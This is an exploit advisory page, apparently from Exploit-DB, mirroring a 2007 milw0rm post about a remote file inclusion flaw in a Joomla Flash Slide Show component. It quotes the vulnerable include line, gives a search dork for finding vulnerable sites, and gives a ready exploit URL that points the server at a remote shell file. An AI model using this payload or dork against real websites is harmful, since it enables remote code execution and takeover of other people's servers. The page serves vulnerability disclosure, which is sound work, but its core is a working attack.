Joomla Component Flash Slide Show (admin.slideshow1.php) - RFI

vendor:

by:

ShockShadow - Electronic Security Team (www.Yee7.com)

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name:

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Joomla Component Flash Slide Show (admin.slideshow1.php) – RFI

This exploit allows an attacker to include remote files in the Joomla Component Flash Slide Show Image Gallery. The vulnerability is considered high risk.

Mitigation:

Source

Exploit-DB raw data:

--==+=================== Electronic Security Team (www.Yee7.com) ====================+==--
--==+         Joomla Component Flash Slide Show (admin.slideshow1.php) - RFI         +==--
--==+================================================================================+==--

Script Name:  Joomla Component Flash Slide Show Image Gallery
exploit:      Remote File Inclusion [High Risk]
Author:       ShockShadow - Electronic Security Team (www.Yee7.com)
Home:         www.Yee7.com
Download:     http://www.joomlahacks.com/component/option,com_remository/Itemid,41/func,download/id,491/chk,cb182dd5ecd024f36f7a8fa98dd8935e/
             http://www.box.net/shared/6xeh4doczd
Search Key:   inurl:/com_slideshow/

##############################

Line 3 of admin.slideshow1.php
>    include( "$mosConfig_live_site/components/com_slideshow1/about.html" );
==============

eXploit: http://domain.com/Joomla_Path/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://shell.txt

###############################
by: ShockShadow
GrEEtZ t0:
Mr.HaCkEr, Mr-m07, Al-Shikh, ThE WhitE WolF, HuRrIcAnE, S0m.Ph, KEENEST, HamzaBX1, Alakrb Almoftres, Falcon Hammdan, RoMaNcYxHaCkEr
Medo Hacker, rUn-vIrUs, Dr.eXe, zAx
AND ALL FRIENDS

# milw0rm.com [2007-09-21]